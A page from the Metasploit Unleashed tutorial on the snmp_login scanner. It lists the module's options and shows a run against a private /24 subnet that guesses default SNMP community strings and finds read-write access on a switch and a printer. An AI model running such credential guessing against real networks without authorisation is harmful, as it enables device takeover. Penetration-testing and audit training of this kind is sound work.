auxiliary/scanner/snmp/snmp_login

From Metasploit Unleashed - Mastering The Framework

Jump to: navigation, search

The snmp_login scanner is a module that scans a range of IP addresses to determine the community string for SNMP-enabled devices. 

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > show options

Module options:

   Name              Current Setting                                             Required  Description
   ----              ---------------                                             --------  -----------
   BATCHSIZE         256                                                         yes       The number of hosts to probe in each set
   BLANK_PASSWORDS   true                                                        yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                           yes       How fast to bruteforce, from 0 to 5
   CHOST                                                                         no        The local client address
   PASSWORD                                                                      no        The password to test
   PASS_FILE         /opt/metasploit3/msf3/data/wordlists/snmp_default_pass.txt  no        File containing communities, one per line
   RHOSTS                                                                        yes       The target address range or CIDR identifier
   RPORT             161                                                         yes       The target port
   STOP_ON_SUCCESS   false                                                       yes       Stop guessing when a credential works for a host
   THREADS           1                                                           yes       The number of concurrent threads
   USERNAME                                                                      no        A specific username to authenticate as
   USERPASS_FILE                                                                 no        File containing users and passwords separated by space, one pair per line
   USER_FILE                                                                     no        File containing usernames, one per line
   VERBOSE           true                                                        yes       Whether to print output for all attempts

We set our RHOSTS and THREADS values while using the default wordlist and let the scanner run. 

msf auxiliary(snmp_login) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(snmp_login) > set THREADS 254
THREADS => 254
msf auxiliary(snmp_login) > run

[+] SNMP: 192.168.1.2 community string: 'public' info: 'GSM7224 L2 Managed Gigabit Switch'
[+] SNMP: 192.168.1.199 community string: 'public' info: 'HP ETHERNET MULTI-ENVIRONMENT'
[+] SNMP: 192.168.1.2 community string: 'private' info: 'GSM7224 L2 Managed Gigabit Switch'
[+] SNMP: 192.168.1.199 community string: 'private' info: 'HP ETHERNET MULTI-ENVIRONMENT'
[*] Validating scan results from 2 hosts...
[*] Host 192.168.1.199 provides READ-WRITE access with community 'internal'
[*] Host 192.168.1.199 provides READ-WRITE access with community 'private'
[*] Host 192.168.1.199 provides READ-WRITE access with community 'public'
[*] Host 192.168.1.2 provides READ-WRITE access with community 'private'
[*] Host 192.168.1.2 provides READ-ONLY access with community 'public'
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(snmp_login) >
Our quick SNMP sweep found both the default public and private community strings of 2 devices on our network. This module can also be a useful tool for network administrators to identify attached devices that are insecurely configured.

SNMP Scanners


Retrieved from "http://www.offensive-security.com/metasploit-unleashed/SNMP_SNMP_Login"
Personal tools